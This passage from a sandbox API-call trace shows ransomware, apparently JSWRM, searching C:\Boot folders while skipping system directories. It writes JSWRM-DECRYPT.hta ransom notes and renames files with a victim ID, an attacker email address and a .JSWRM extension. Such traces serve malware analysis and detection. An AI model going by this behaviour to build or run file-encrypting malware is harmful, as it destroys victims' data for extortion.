cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0063.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.780] MoveFileW (lpExistingFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\es-ES\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.780] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.780] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.780] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="es-MX", cAlternateFileName="")) returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2=".") returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="..") returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="...") returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="windows") returned -1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="recovery") returned -1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="perflogs") returned -1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="documents and settings") returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="$RECYCLE.BIN") returned 1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="system volume information") returned -1 [0063.781] lstrcmpiW (lpString1="es-MX", lpString2="msocache") returned -1 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.781] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-mx\\jswrm-decrypt.hta")) returned 0xffffffff [0063.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237268 [0063.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.782] CreateFileW (lpFileName="C:\\Boot\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-mx\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.782] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.782] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.783] CloseHandle (hObject=0x450) returned 1 [0063.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237268 | out: hHeap=0x1e0000) returned 1 [0063.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.784] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-mx\\jswrm-decrypt.hta")) returned 0x20 [0063.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.784] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0063.784] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.784] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.785] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.785] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.785] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.785] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.785] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.786] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.786] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.787] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.787] CloseHandle (hObject=0xffffffff) returned 1 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0063.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.788] MoveFileW (lpExistingFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.788] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cad1b08, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cad1b08, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.788] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.789] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cad1b08, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cad1b08, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.789] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.789] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="et-EE", cAlternateFileName="")) returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2=".") returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="..") returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="...") returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="windows") returned -1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="recovery") returned -1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="perflogs") returned -1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="documents and settings") returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="$RECYCLE.BIN") returned 1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="system volume information") returned -1 [0063.789] lstrcmpiW (lpString1="et-EE", lpString2="msocache") returned -1 [0063.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.789] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\et-ee\\jswrm-decrypt.hta")) returned 0xffffffff [0063.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.790] HeapFree (in: hHeap=0x1e0000, 